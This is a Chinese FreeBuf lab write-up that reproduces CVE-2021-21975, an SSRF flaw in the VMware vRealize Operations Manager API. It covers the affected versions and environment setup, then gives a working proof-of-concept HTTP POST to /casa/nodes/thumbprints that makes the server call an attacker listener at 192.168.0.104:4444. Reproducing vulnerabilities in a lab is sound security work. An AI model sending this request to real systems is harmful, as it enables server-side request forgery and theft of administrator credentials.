CVE-2021-21975 VMware vRealize SSRF 漏洞复现 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

漏洞

CVE-2021-21975 VMware vRealize SSRF 漏洞复现

2021-08-02 16:03:18

0x00 简介

vRealize Operations Manager是vmware官方提供的针对vmware虚拟化平台的一套运营管理解决方案，通过它可以看到整个虚拟化环境的整体运行情况，潜在风险，以及优化建议等，同时可以提供一些虚拟化运行配置、容量、优化建议等等报告。vRealize Operations Manager 提供跨物理、虚拟和云基础架构的智能运维管理以及从应用程序到存储的可见性。使用基本策略的自动化，操作团队实现关键过程的自动化并提高 IT 效率。利用从系统资源（对象）中收集的数据，vRealize Operations Manager 通常能够在客户注意到问题之前识别任何受监控系统组件中的问题。vRealize Operations Manager还经常会向您建议可用来立即修复问题的纠正措施。

0x01 漏洞概述

vRealize Operations Manager API中存在一个服务器端请求伪造漏洞，其CVSS评分为8.6。具有vRealize Operations Manager API网络访问权限攻击者可以通过利用此漏洞执行服务器端请求伪造攻击，以窃取管理员凭据。

0x02 影响版本

VMwarevRealizeOperations8.3.0、8.2.0、8.1.1、8.1.0、7.5.0
VMwareCloudFoundation4.x、3.x
vRealizeSuiteLifecycleManager8.x

0x03 环境搭建

1.下载ova文件

https://my.vmware.com/group/vmware/patch

2.下载后导入vmware

选择部署选项

点击导入

导入完成后记下显示的ip

3.导入完成后打开访问虚拟机 ip 192.168.0.105，然后点击快速安装

直接点击下一步

输入自己的密码，然后点击下一步

点击下一步后开始安装

等待安装完成之后，环境搭建就好了

0x04 漏洞复现

1.使用官方poc进行验证，bp抓包，action->repeater，替换为如下内容

POST/casa/nodes/thumbprintsHTTP/1.1
Host:192.168.0.105
Connection:close
Cache-Control:max-age=0
sec-ch-ua:"Google Chrome";v="89","Chromium";v="89",";Not A Brand";v="99"
sec-ch-ua-mobile:?0
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/89.0.4389.90Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type:application/json;charset=UTF-8
Sec-Fetch-Site:none
Sec-Fetch-Mode:navigate
Sec-Fetch-User:?1
Sec-Fetch-Dest:document
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9
Content-Length:23

["192.168.0.104:4444"]